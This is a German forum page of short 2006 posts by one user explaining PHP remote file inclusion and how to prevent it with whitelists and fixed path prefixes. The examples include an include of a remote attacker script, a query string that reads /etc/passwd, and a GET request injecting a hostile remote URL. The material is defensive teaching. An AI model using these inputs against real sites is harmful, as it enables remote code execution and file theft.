Forum: Programmieren allgemein
by alcaeus,
16. Aug 2006
Das ist ja nicht das Problem. Das Problem ist, dass du alles moegliche includen kannst. Nehmen wir mal sowas:
include('http://badserver.tld/badscript.txt');
Der Code ladet bei aktivem allow_url_fopen den Inhalt von badscript.txt und fuehrt ihn anschliessend aus. Das ist...suboptimal.
Ein weiteres Problem:
mypage.php?include=/etc/passwd
Bei einem nicht optimal konfigurierten Server (und das...
Forum: Programmieren allgemein
by alcaeus,
14. Aug 2006
Meine eigene Abkuerzung fuer Remote-File-Inclusion. Ich bin zu faul das auszuschreiben :P
Greetz
alcaeus
Forum: Programmieren allgemein
by alcaeus,
14. Aug 2006
Ja, das ist eine Art "Zwischenloesung", die ich persoenlich aber auch nicht verwenden wuerde. So kann ich wenigstens noch festlegen, was der Benutzer machen kann/darf.
Wenn ich dynamische Webseiten erstelle, und auf sowas zurueckgreifen muss, dann liegen die Module normalerweise in der Datenbank, und werden ueber eine ID oder einen sprechenden Namen aufgerufen (z.B....
Forum: Programmieren allgemein
by alcaeus,
14. Aug 2006
Schoen waers, traurige Wahrheit ist, dass es bei den meisten Hostern an ist, und der 0815-PHPler keinen Plan hat was es ist.
Noch eine Stufe besser: explizit sagen was erlaubt ist:
$site = (isset($_GET)) ? $_GET : '';
$allowed_sites = array('main', 'contact', 'foo', 'bar');
if (!in_array($site, $allowed_sites))
{
$site = 'main';
}
Forum: Programmieren allgemein
by alcaeus,
14. Aug 2006
Moin,
ich gehe mal davon aus, dass register_globals aktiv ist? Dann mach ich z.B. sowas:
GET deinskript.php?Sec=http://meineseite.de/boesesscript.php?
Ergebnis: include('http://meineseite.de/boesesscript.php?home.php');
Mach z.B. immer sowas:
include './'. $Sec .'home.php';
Weiters solltest du bei den Leuten anfragen, was genau das Problem zu sein scheint, und wie sie von der Luecke...